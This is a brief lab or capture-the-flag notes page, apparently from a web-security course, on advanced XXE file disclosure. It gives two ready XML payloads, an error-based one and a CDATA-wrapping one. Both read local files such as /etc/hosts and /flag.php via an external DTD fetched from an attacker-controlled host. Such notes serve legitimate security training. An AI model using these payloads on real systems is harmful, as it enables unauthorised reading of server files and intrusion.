Advanced File Disclosure

For option 1

subl xxe.dtd
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Access the /error page

/error/submitDetails.php

<!DOCTYPE email [ 

  <!ENTITY % remote SYSTEM "http://10.10.15.45:8000/xxe.dtd">

  %remote;

  %error;

]>

For the flag

For option 2

echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.15.45:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;

]>

PreviousLocal File Disclosure NextBlind Data Exfiltration

Last updated 11 months ago